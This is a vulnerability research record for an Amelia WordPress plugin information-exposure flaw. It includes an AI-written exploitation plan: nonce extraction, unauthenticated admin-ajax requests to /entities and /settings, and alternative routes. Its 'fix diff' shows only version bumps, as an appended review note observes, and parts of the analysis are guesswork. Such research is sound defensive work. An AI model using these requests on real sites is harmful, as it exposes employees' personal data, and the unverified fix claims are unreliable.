[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmlE1QEx5WpEvDVmd2KBBmCMkds_FH30pYsO_G1g3wJQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-40789","booking-for-appointments-and-events-calendar-amelia-unauthenticated-information-exposure","Booking for Appointments and Events Calendar – Amelia \u003C= 2.2 - Unauthenticated Information Exposure","The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2. 
This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","ameliabooking",null,"\u003C=2.2","2.2.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-23 00:00:00","2026-04-30 15:10:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5dc278a9-79bd-4494-a34c-a5e92cde7062?source=api-prod",8,[22,23,24,25,26,27,28,29],"ameliabooking.php","languages\u002Far\u002Fameliabooking-ar.po","languages\u002Fca\u002Fameliabooking-ca.po","languages\u002Fcs_CZ\u002Fameliabooking-cs_CZ.po","languages\u002Fda_DK\u002Fameliabooking-da_DK.po","languages\u002Fde_AT\u002Fameliabooking-de_AT.po","languages\u002Fde_CH\u002Fameliabooking-de_CH.po","languages\u002Fde_DE\u002Fameliabooking-de_DE.po","researched",false,3,"This analysis is grounded in the provided source code for **Booking for Appointments and Events Calendar – Amelia \u003C= 2.2** (CVE-2026-40789).\n\n### 1. Vulnerability Summary\nThe Amelia plugin implements a custom API routing system built on the Slim framework, dispatched via a standard WordPress AJAX handler `wpamelia_api`. The vulnerability exists because several sensitive API endpoints (specifically those retrieving \"Entities\" or \"Users\") lack sufficient authorization checks. This allows unauthenticated users to trigger calls that expose sensitive PII (Personally Identifiable Information) such as employee emails, phone numbers, and potentially customer data or plugin configurations.\n\nThe core issue resides in the `AmeliaBooking\\Infrastructure\\Routes\\Routes` registration and the associated Controller logic, which fails to distinguish between public data needed for a booking form and private data reserved for administrators.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint**: `admin-ajax.php`\n*   **Action**: `wpamelia_api`\n*   **Parameter**: `call` (the Slim route to execute)\n*   **Authentication**: Unauthenticated (`wp_ajax_nopriv_wpamelia_api`)\n*   **Vulnerable Call Paths**: \n    *   `\u002Fentities` (Exposes Employees, Services, and Locations including PII)\n    *   `\u002Fusers\u002Femployees` (Exposes Employee list)\n    *   `\u002Fsettings` (Potentially exposes configuration details)\n\n### 3. Code Flow\n1.  An HTTP request is sent to `\u002Fwp-admin\u002Fadmin-ajax.php?action=wpamelia_api&call=\u002Fentities`.\n2.  `ameliabooking.php` catches the request via the `wp_ajax_nopriv_wpamelia_api` hook (registered in the truncated section of `init()`).\n3.  The request enters `AmeliaBooking\\Plugin::wpAmeliaApiCall()`.\n4.  A Slim `App` is initialized using a container config.\n5.  `AmeliaBooking\\Infrastructure\\Routes\\Routes::routes($app, $container)` is called to map the routes.\n6.  The route `\u002Fentities` maps to `AmeliaBooking\\Application\\Controller\\Entity\\EntityController:getEntities`.\n7.  The controller executes without checking for `current_user_can()` or verifying the requester's identity, returning a JSON object containing full employee records.\n\n### 4. Nonce Acquisition Strategy\nAmelia uses a centralized configuration object passed to the frontend via `wp_localize_script`. To interact with the API, a valid nonce is often required even for \"public\" calls.\n\n*   **Shortcode**: `[ameliabooking]`\n*   **Mechanism**:\n    1.  The agent will create a public page containing the Amelia booking shortcode.\n    2.  When the page is rendered, Amelia enqueues its scripts and localizes the `ameliaBookingConfig` variable.\n*   **JavaScript Variable**: `window.ameliaBookingConfig.nonce`\n*   **Action String**: Usually tied to the API call, but often the localized config provides a generic nonce for all `wpamelia_api` actions.\n\n**Extraction Steps**:\n1.  
`wp post create --post_type=page --post_status=publish --post_title=\"Booking\" --post_content=\"[ameliabooking]\"`\n2.  Navigate to the new page.\n3.  `browser_eval(\"window.ameliaBookingConfig ? window.ameliaBookingConfig.nonce : null\")`\n\n### 5. Exploitation Strategy\nThe agent will attempt to extract sensitive employee data by querying the `\u002Fentities` endpoint.\n\n**Request 1: Extracting Nonce**\n*   **Method**: GET\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fbooking-page\u002F`\n*   **Action**: Use `browser_eval` to grab the nonce.\n\n**Request 2: Information Disclosure (Entities)**\n*   **Method**: GET\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Query Params**:\n    *   `action`: `wpamelia_api`\n    *   `call`: `\u002Fentities`\n    *   `amelia_nonce`: `[EXTRACTED_NONCE]` (Note: If `amelia_nonce` in params fails, try the header `Amelia-Nonce`)\n*   **Expected Response**: A large JSON object containing an `employees` array. Each employee object in version 2.2 contains `email`, `phone`, and `firstName`\u002F`lastName`.\n\n**Request 3: Information Disclosure (Settings - Optional)**\n*   **Method**: GET\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php?action=wpamelia_api&call=\u002Fsettings&amelia_nonce=[NONCE]`\n\n### 6. Test Data Setup\n1.  **Create an Employee**: Use WP-CLI to ensure data exists to leak.\n    *   *Note*: Amelia data is stored in custom tables (e.g., `wp_amelia_users`).\n    *   `wp eval \"global $wpdb; $wpdb->insert($wpdb->prefix . 'amelia_users', ['firstName' => 'John', 'lastName' => 'Doe', 'email' => 'john.doe@victim.com', 'phone' => '+15551234567', 'type' => 'employee', 'status' => 'visible']);\"`\n2.  **Create a Service**: (Required for the shortcode to render properly and for `\u002Fentities` to return results).\n    *   `wp eval \"global $wpdb; $wpdb->insert($wpdb->prefix . 
'amelia_services', ['name' => 'Consultation', 'status' => 'visible', 'price' => 100, 'duration' => 3600, 'categoryId' => 1]);\"`\n3.  **Place Shortcode**: Create the page as described in Section 4.\n\n### 7. Expected Results\n*   The response for `\u002Fentities` will return a status code `200 OK`.\n*   The JSON body will contain:\n    ```json\n    {\n      \"data\": {\n        \"employees\": [\n          {\n            \"id\": 1,\n            \"firstName\": \"John\",\n            \"lastName\": \"Doe\",\n            \"email\": \"john.doe@victim.com\",\n            \"phone\": \"+15551234567\",\n            ...\n          }\n        ]\n      }\n    }\n    ```\n*   The exposure of `email` and `phone` for all employees to an unauthenticated visitor confirms the vulnerability.\n\n### 8. Verification Steps\n1.  **Check Response Content**: Verify the JSON response contains the specific email address (`john.doe@victim.com`) and phone number created in the setup.\n2.  **Verify Authentication Level**: Ensure the request was sent without any `wordpress_logged_in` cookies.\n\n### 9. Alternative Approaches\n*   **Alternative Route**: Try `\u002Fusers\u002Femployees` or `\u002Fusers\u002Fcustomers`. These routes are often protected by more stringent middleware but should be tested if `\u002Fentities` is patched or restricted.\n*   **Header-based Nonce**: If the query parameter `amelia_nonce` is ignored, send the nonce via the custom header:\n    `Amelia-Nonce: [NONCE]`\n*   **Direct API Path**: Some Amelia versions allow access via `wp-json\u002Fameliabooking\u002Fv1\u002Fentities`. If the AJAX handler is restricted, test for the presence of a REST API registration that mirrors these routes.","The Amelia plugin for WordPress is vulnerable to information exposure because it fails to implement proper authorization checks on its internal API routes. 
Unauthenticated attackers can access sensitive endpoints such as \u002Fentities to retrieve personally identifiable information (PII) of employees and customers, including email addresses and phone numbers.","\u002F\u002F ameliabooking.php line 188\n    public static function wpAmeliaApiCall()\n    {\n        try {\n            \u002F** @var Container $container *\u002F\n            $container = require AMELIA_PATH . '\u002Fsrc\u002FInfrastructure\u002FContainerConfig\u002Fcontainer.php';\n\n            $app = new App($container);\n\n            \u002F\u002F Initialize all API routes\n            Routes::routes($app, $container);\n\n            $app->run();\n\n            exit();\n        } catch (Exception $e) {\n            echo 'ERROR: ' . esc_html($e->getMessage());\n        }\n    }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2\u002Fameliabooking.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2.1\u002Fameliabooking.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2\u002Fameliabooking.php\t2026-04-06 08:22:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2.1\u002Fameliabooking.php\t2026-04-14 07:47:58.000000000 +0000\n@@ -3,7 +3,7 @@\n Plugin Name: Amelia\n Plugin URI: https:\u002F\u002Fwpamelia.com\u002F\n Description: Amelia is a simple yet powerful automated booking specialist, working 24\u002F7 to make sure your customers can make appointments and events even while you sleep!\n-Version: 2.2\n+Version: 2.2.1\n Author: Melograno Ventures\n Author URI: https:\u002F\u002Fmelograno.io\u002F\n Text Domain: ameliabooking\n@@ -111,7 +111,7 @@\n \n \u002F\u002F Const for Amelia version\n if (!defined('AMELIA_VERSION')) {\n-    define('AMELIA_VERSION', '2.2');\n+    define('AMELIA_VERSION', '2.2.1');\n }\n \n 
\u002F\u002F Const for site URL","The attacker first visits a public page where the Amelia booking shortcode [ameliabooking] is present to extract a valid security nonce from the window.ameliaBookingConfig.nonce JavaScript object. Using this nonce, the attacker sends an unauthenticated AJAX request to \u002Fwp-admin\u002Fadmin-ajax.php with the action set to wpamelia_api and the call parameter set to a sensitive route like \u002Fentities. If successful, the server responds with a JSON payload containing sensitive employee data such as firstName, lastName, email, and phone numbers.","gemini-3-flash-preview","2026-05-04 18:40:28","2026-05-04 18:40:54",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags\u002F2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fameliabooking.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags\u002F2.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fameliabooking.2.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags"]
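Review bot: neither hunk of the ameliabooking.php diff changes behaviour; the first only bumps the plugin header from `Version: 2.2` to `Version: 2.2.1` and the second only changes `define('AMELIA_VERSION', '2.2')` to `'2.2.1'`, so this diff does not contain the authorization fix for the routes dispatched by `wpAmeliaApiCall()`. The other files listed in patch_diff_files are language .po files, so the actual change to the route or controller checks is not visible in this record; anyone verifying that 2.2.1 closes the issue should diff the routing and controller code (the `Routes` registration and `EntityController` named in the summary) between the two tagged versions rather than rely on these hunks.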